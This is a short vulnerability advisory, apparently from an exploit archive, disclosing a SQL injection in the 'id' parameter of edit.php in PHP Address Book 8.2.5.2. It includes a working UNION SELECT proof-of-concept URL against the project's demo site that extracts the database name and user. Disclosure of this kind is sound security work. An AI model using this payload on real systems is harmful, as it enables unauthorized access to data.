PHP Address Book 8.2.5.2 SQL Injection

2015.11.18

Credit: Rahul Pratap Singh

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

## Full Disclosure
#Exploit Title : PHP Address Book SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 14/Nov/2015
#Home Page Link : http://sourceforge.net/projects/php-addressbook/
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
1. Description
"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.
2. Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
## Vendor Response
No reply from vendor

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP Address Book 8.2.5.2 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.